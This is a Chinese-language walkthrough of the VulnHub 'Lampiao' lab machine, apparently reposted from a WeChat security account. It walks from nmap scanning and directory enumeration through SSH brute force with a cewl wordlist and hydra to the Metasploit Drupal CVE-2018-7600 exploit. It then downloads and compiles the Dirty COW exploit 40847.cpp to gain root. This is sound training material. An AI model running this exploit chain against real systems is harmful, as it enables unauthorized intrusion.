Vulhub系列之Lampiao

admin 2021年5月8日19:14:49评论85 views字数 1641阅读5分28秒阅读模式

Vulhub系列之Lampiao

一、靶机地址

1.https://www.vulnhub.com/entry/lampiao-1,249/

2.下载镜像直接用VMware打开即可。

二、实验环境:

1.攻击机:kali  IP192.168.31.128

2.靶机:IP  192.168.31.130

三、要求:

1.拿到root权限

四、复现

1.探测存活主机确认靶机ip

语法:nmap -sP  192.168.31.0/24

描述:起始ip 192.168.31.1 结束ip 192.168.31..254 攻击机 192.168.31.128 所以确定靶机ip 192.168.31.130 

Vulhub系列之Lampiao

2.扫描以开放的端口等详细信息

语法:nmap -p- -A 192.168.31.130

图中可以看出,目标计算机上有三个可用的开放端口22801898端口。这里对22端口,尝试ssh弱口令爆破。

Vulhub系列之Lampiao

3.由于目标计算机上的端口80可用,我们先来检查下web页面。我们在浏览器上打开了目标计算机的IP,它显示了 一个有趣的页面

 

Vulhub系列之Lampiao

还有个1898端口开启状态,继续访问获取信息。

 

Vulhub系列之Lampiao

Vulhub系列之Lampiao


audio.m4a

qrc.png

访问这个有一段语音和一个二维码语音内容为user tiago,则用户名为:tiago

二维码用微信扫描发现为一句话:Try harderMuahuahua 

Vulhub系列之Lampiao

Vulhub系列之Lampiao

接下来对网站就行爆破扫描

使用kali自带的dirb进行扫描

语法:dirb http://192.168.31.130:1898 -o out

Vulhub系列之Lampiao

找到robots.txt文件打开看看

Vulhub系列之Lampiao

打开/CHANGELOG.txt看了看发现网站版本信息

Vulhub系列之Lampiao

这是一个基于Drupal 7的网站

Vulhub系列之LampiaoVulhub系列之Lampiao

cewl:通过爬行网站获取关键信息创建一个密码字典

hydra:神器九头蛇

命令cewl http://192.168.31.130:1898/?q=node/1 -w lj.txt

hydra -l tiago -P lj.txt 192.168.31.130 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、然后九头蛇

暴力破解得到用户密码:

用户: tiago

密码: Virgulino

命令ssh [email protected]

提示输入密码

Vulhub系列之Lampiao

使用用户名tiago进行ssh登陆连接,成功连接

进行提权

网上搜索到到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透

运行msfconsole

Vulhub系列之Lampiao

Vulhub系列之Lampiao 

先查询durpalMSF中存在哪些漏洞,我们需要使用的是2018年的漏洞

Use 使用1模块

Vulhub系列之Lampiao

show option查询渗透信息,需要填写Rhosts攻击IPRport攻击端口

Vulhub系列之Lampiao

Run运行

Vulhub系列之Lampiao

Vulhub系列之Lampiao

Vulhub系列之Lampiao 

和前面ssh登陆的tiago用户权限类似

下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp

Vulhub系列之Lampiao

使用CP进行复制到本地,cp /usr/share/exploitdb/exploits/linux/local/40847.cpp

开启本地python服务然后把40847.cpp发送靶机上。

Vulhub系列之Lampiao

执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用 python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:python -c 'import pty; pty.spawn("/bin/bash")'

Vulhub系列之Lampiao

命令:wget http://192.168.31.128:5555/40847.cpp

40847.cp上传到靶机上。

Vulhub系列之Lampiao

Vulhub系列之Lampiao

在进入到tmp

Vulhub系列之Lampiao

Vulhub系列之Lampiao

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

Vulhub系列之Lampiao

Vulhub系列之Lampiao

重新打开窗口

命令ssh [email protected]

Vulhub系列之Lampiao

 至此,成功获取到flag

本文始发于微信公众号(LSCteam):Vulhub系列之Lampiao

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月8日19:14:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulhub系列之Lampiaohttps://cn-sec.com/archives/368707.html

发表评论

匿名网友 填写信息